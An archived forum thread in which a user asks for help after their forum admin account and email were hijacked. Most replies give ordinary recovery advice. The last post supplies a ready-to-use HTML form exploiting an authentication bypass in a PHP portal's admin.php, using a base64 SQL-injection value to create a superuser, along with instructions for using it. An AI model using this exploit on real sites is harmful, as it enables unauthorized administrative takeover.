Thread: My forum was hacked... ¬_¬

My forum was hacked... ¬_¬

I went to open IE to my forum but I found that I had been logged out and my password had been changed. When I went to request the password to send to my e-mail - that also had been hacked into.

Can I please get help on how to resolve this problem?

http://s9.invisionfree.com/MikJam is the URL.
    =======
    ~MikJam~
    =======

I would contact whoever hosts your email and explain the problem. They can likely set you up with your email account again, if you can prove that you are who you say you are.

If you gave an alternate email address when you signed up for the email account, see if that still works.

Otherwise, contact whoever hosts the forum. Same thing. Explain the problem to them, and maybe they'll be willing to help you.

Other than that, there's not much anyone can do to help you.
    Government is like fire - a handy servant, but a dangerous master - George Washington
    Government is not reason, it is not eloquence - it is force. - George Washington.

Join the UnError community!

Thanks, I'll get to it straight away. :P
    =======
    ~MikJam~
    =======

We had this problem happen to a member of my home forum as well. A few questions though:

1) Have you ever posted pics/files from a personal server?
    >>I ask because our member had his account "hacked" because he posted pics from a personal site that required a login and his login was able to be seen in the URL. Yes, I know: dumb

2) What kind of board is it? PHPBB? VBulletin?
    >>If the board's not up to date with their settings then the site itself could have been hacked into. Check to see if any other members are experiencing similar problems.

3) Gotten into it lately with another poster?
    >> Recent online flame wars tend to make people do stupid things
    And so at last the beast fell and the unbelievers rejoiced. But all was not lost, for from the ash rose a great bird. The bird gazed down upon the unbelievers and cast fire and thunder upon them. For the beast had been reborn with its strength renewed, and the followers of Mammon cowered in horror. -from The Book of Mozilla, 7:15

AntiOnline Senior Medicine Man
    Odds are it is someone you know who hacked your email account. Your secret question was prolly something gay like, "Whats your pets name". All your friends know your pets name. Bah.. like i said though.. someone who knows you from my point of view... unless your PW was all easy to crack...
    It is better to be HATED for who you are, than LOVED for who you are NOT.

THC/IP Version 4.2

Was is a php forum?because there are loads of bugs in PHP which could let anyone take the admin rights.!
    I'll post some bugs here,try to use them in your site and see that they are patched

check out for more bugs at http://www.securityfocus.com/bid/12249
    <form name="exploit" method="POST" action="http://www.xyz.com/online/admin.php">
    <p>USERNAME:
    <input type="text" name="add_aid">
    <br>
    NOME:
    <input type="text" name="add_name">
    <br>
    PASSWORD:
    <input type="text" name="add_pwd">
    <br>
    E-MAIL:
    <input type="text" name="add_email">
    <br>
    <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
    <br>
    <input type="hidden" name="add_radminsuper" value="1">
    <br>
    <input type="hidden" name="op" value="AddAuthor">
    </p>
    <p>
    <input type="submit" name="Submit" value="Create Admin">
    <br>
    </p>
    </form>

Just save the file as *.html* and open it in your favourite browser.Just fill up the form create the admin and log on the to the account and your in.
    Good luck